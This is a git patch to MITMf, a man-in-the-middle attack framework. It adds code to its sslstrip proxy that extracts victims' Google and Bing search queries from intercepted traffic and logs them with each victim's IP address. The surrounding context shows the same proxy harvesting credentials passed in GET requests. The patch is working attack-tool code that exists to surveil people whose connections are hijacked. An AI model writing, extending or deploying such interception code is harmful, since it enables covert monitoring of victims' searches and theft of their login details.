From 58bd73bb28d0e142485f6b4c4df8a87508ab4c1e Mon Sep 17 00:00:00 2001
From: byt3bl33d3r <byt3bl33d3r@gmail.com>
Date: Mon, 15 Dec 2014 19:46:32 +0100
Subject: [PATCH] fixed bug, MITMf now logs search engine queries

---
 libs/sslstrip/ServerConnection.py     | 25 +++++++++++++++++++++++++
 libs/sslstripplus/ServerConnection.py |  1 -
 2 files changed, 25 insertions(+), 1 deletion(-)

diff --git a/libs/sslstrip/ServerConnection.py b/libs/sslstrip/ServerConnection.py
index 48e2e63..c4900b8 100644
--- a/libs/sslstrip/ServerConnection.py
+++ b/libs/sslstrip/ServerConnection.py
@@ -70,6 +70,31 @@ class ServerConnection(HTTPClient):
             else:
                 logging.info(message)
 
+            #Capture google searches
+            if ('google' in self.headers['host']):
+                if ('search' in self.uri): #and ('search' in self.uri):
+                    try:
+                        for param in self.uri.split('&'):
+                            if param.split('=')[0] == 'q':
+                                query = str(param.split('=')[1])
+                                if query:
+                                    logging.info("%s is querying %s for %s" % (self.client.getClientIP(), self.headers['host'], query))
+                    except Exception, e:
+                        error = str(e)
+                        logging.warning("%s Error parsing google search query %s" % (self.client.getClientIP(), error))
+
+            if ('bing' in self.headers['host']):
+                if ('Suggestions' in self.uri):
+                    try:
+                        for param in self.uri.split('&'):
+                            if param.split('=')[0] == 'qry':
+                                query = str(param.split('=')[1])
+                                if query:
+                                    logging.info("%s is querying %s for %s" % (self.client.getClientIP(), self.headers['host'], query))
+                    except Exception, e:
+                        error = str(e)
+                        logging.warning("%s Error parsing bing search query %s" % (self.client.getClientIP(), error))
+
             #check for creds passed in GET requests.. It's surprising to see how many people still do this (please stahp)
             for user in self.http_userfields:
                 username = re.findall("("+ user +")=([^&|;]*)", self.uri, re.IGNORECASE)
diff --git a/libs/sslstripplus/ServerConnection.py b/libs/sslstripplus/ServerConnection.py
index 032585f..ca7498a 100644
--- a/libs/sslstripplus/ServerConnection.py
+++ b/libs/sslstripplus/ServerConnection.py
@@ -46,7 +46,6 @@ class ServerConnection(HTTPClient):
         self.headers          = headers
         self.client           = client
         self.urlMonitor       = URLMonitor.getInstance()
-        self.responseTamperer = ResponseTampererFactory.getTampererInstance()
         self.plugins          = ProxyPlugins.getInstance()
         self.isImageRequest   = False
         self.isCompressed     = False